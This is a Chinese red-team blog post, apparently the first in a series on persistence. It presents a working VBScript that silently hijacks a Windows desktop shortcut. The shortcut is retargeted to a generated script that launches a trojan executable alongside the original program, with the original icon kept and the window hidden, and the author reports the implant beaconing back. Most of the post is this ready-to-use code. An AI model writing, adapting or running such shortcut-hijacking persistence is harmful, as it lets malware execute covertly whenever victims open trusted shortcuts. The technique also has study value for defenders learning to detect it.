首页 > 其他分享 >【攻防技术系列+权限维持】①

【攻防技术系列+权限维持】①

时间:2024-06-09 23:21:52浏览次数:17  
标签:攻防 系列 oShellLink 文件 34 vbs chr lnk 权限

这种方式我觉得挺好用的,且不需要管理员权限,我们都知道lnk文件可以指向一个exe文件,相当于一个快捷方式,所以我们可以更改指向的文件,指向我们的exe文件,但是这样的话原本的lnk文件就没用了,所以我们可以CreateShortcut方法来创建lnk快捷方式,在不损坏其原始lnk文件的情况下且可以执行我们的恶意文件。

如下vbs代码:

implant = "C:\tasks\恶意木马.exe"
newTarget = "C:\tasks\beacon.vbs"
lnkName = "C:\Users\Admin\Desktop\xxx.exe.lnk"

set WshShell = WScript.CreateObject("WScript.Shell" )
strDesktop = WshShell.SpecialFolders("Desktop" )
set oShellLink = WshShell.CreateShortcut(strDesktop & "\" & lnkName )
origTarget = oShellLink.TargetPath
origArgs = oShellLink.Arguments
origIcon = oShellLink.IconLocation
origDir = oShellLink.WorkingDirectory

Set FSO = CreateObject("Scripting.FileSystemObject")
Set File = FSO.CreateTextFile(newTarget,True)
File.Write "Set oShell = WScript.CreateObject(" & chr(34) & "WScript.Shell" & chr(34) & ")" & vbCrLf
File.Write "oShell.Run " & chr(34) & implant & chr(34) & vbCrLf
File.Write "oShell.Run " & chr(34) & oShellLink.TargetPath & " " & oShellLink.Arguments & chr(34) & vbCrLf
File.Close

oShellLink.TargetPath = newTarget
oShellLink.IconLocation = origTarget & ", 0"
oShellLink.WorkingDirectory = origDir
oShellLink.WindowStyle = 7
oShellLink.Save

脚本如下:

大概意思就是从桌面去获取到.lnk文件,然后更改其指向的目标文件,这种方法需要通过创建一个vbs文件来进行完成,这个vbs文件会执行原始文件和我们的木马文件。

wscrip pro.vbs

现在putty.exe.lnk文件已经被修改了。

可以看到文件指向的目标就是我们的beacon.vbs文件了。

而执行beacon.vbs文件,就会执行原始的程序以及我们的木马文件。

可以看到成功上线。

作者 relaysec

标签:攻防,系列,oShellLink,文件,34,vbs,chr,lnk,权限
From: https://www.cnblogs.com/o-O-oO/p/18181015

相关文章

  • AI菜鸟向前飞 — LangChain系列之十七 - 剖析AgentExecutor
    AgentExecutor顾名思义,Agent执行器,本篇先简单看看LangChain是如何实现的。    先回顾AI菜鸟向前飞—LangChain系列之十四-Agent系列:从现象看机制(上篇)AI菜鸟向前飞—LangChain系列之十五-Agent系列:从现象看机制(中篇)一个Agent的“旅行”AI菜鸟向前飞—Lang......
  • 【Docker系列】跨平台 Docker 镜像构建:深入理解`--platform`参数
    ......
  • CMake:构建、打包和测试的跨平台工具系列软件
    介绍CMake是一个开源、跨平台的构建系统,旨在管理软件构建过程。它通过使用简洁的脚本语言描述项目的构建规则,自动生成适用于各种平台的构建文件,如UnixMakefiles、VisualStudio项目和Xcode项目。CMake不仅支持多种编译器和操作系统,还提供了丰富的功能,用于软件的构建、打包和......
  • 《手把手教你》系列练习篇之15-python+ selenium自动化测试 -番外篇 - 最后一波啊!!!(详细
    1.简介 本来上一篇就是练习篇的最后一篇文章了,但是有的小伙伴私下反映说是做了那么多练习,没有一个比较综合的demo练练手。因此宏哥在这里又补存了一些常见的知识点进行练习,在文章最后也通过实例给小伙伴们或者童鞋们进行了一个登录模块的自动化测试的实例,其他的你可以照......
  • 《手把手教你》系列练习篇之14-python+ selenium自动化测试 -压台篇(详细教程)
    1.简介 本文是练习篇的最后一篇文章,虽然练习篇的文章到此就要和大家说拜拜了,但是我们的学习之路才刚刚开始。不要停下你的脚步,大步朝前走吧!比你优秀的人还在走着,我们有什么理由停下自己的脚步了,生命不止,学习亦是如此。好了,宏哥的毒鸡汤好喝吧,喝够了就开始学习吧。......
  • 电机控制系列模块解析(29)—— 逆变器带输出LC滤波器
     一般长线驱动(港口和油矿)和超高速电机(高频)等驱动系统可能会要求加装输出LC滤波器。此图片来源于会议PPT一、逆变器带输出LC滤波器逆变器输出端配置LC滤波器(电感L与电容C组成的无源滤波电路)旨在改善输出电压波形质量、抑制谐波、降低电磁干扰(EMI)以及提高与负载的兼容性。以......
  • Docker大学生看了都会系列(八、Dokcerfile部署go项目)
    系列文章目录第一章Docker介绍第二章2.1Mac通过Homebrew安装Docker第二章2.2CentOS安装Docker第三章Docker常用命令第四章常用命令实战第五章Docker镜像详解第六章Docker容器数据卷第七章Dockerfile详解第八章Dokcerfile部署go项目文章目录一、前言......
  • 攻防世界 shrine
    题目打开就是源码importflaskimportosapp=flask.Flask(__name__)app.config['FLAG']=os.environ.pop('FLAG')@app.route('/')defindex():returnopen(__file__).read()@app.route('/shrine/<path:shrine>')......
  • 攻防世界 easytornado
    题目信息提示了flag在/fllllllllllllagfilehash通过md5(cookie_secret+md5(filename))获得当务之急是找cookie_secre根据题目提示为tornado模板注入,模板注入必须通过传输型如{{xxx}}的执行命令,验证在tornado模板中,存在一些可以访问的快速对象,这里用到的是handler.......
  • 一文搞懂 ARM 64 系列: 寄存器
    ARM64中包含多种寄存器,下面介绍一些常见的寄存器。1通用寄存器ARM64包含31个64bit寄存器,记为X0~X30。每一个通用寄存器,它的低32bit都可以被访问,记为W0~W30。在这31个通用寄存器中,有2个寄存器比较特殊。X29寄存器被作为栈帧寄存器,也被称为FP(FramePointerRegister)。X3......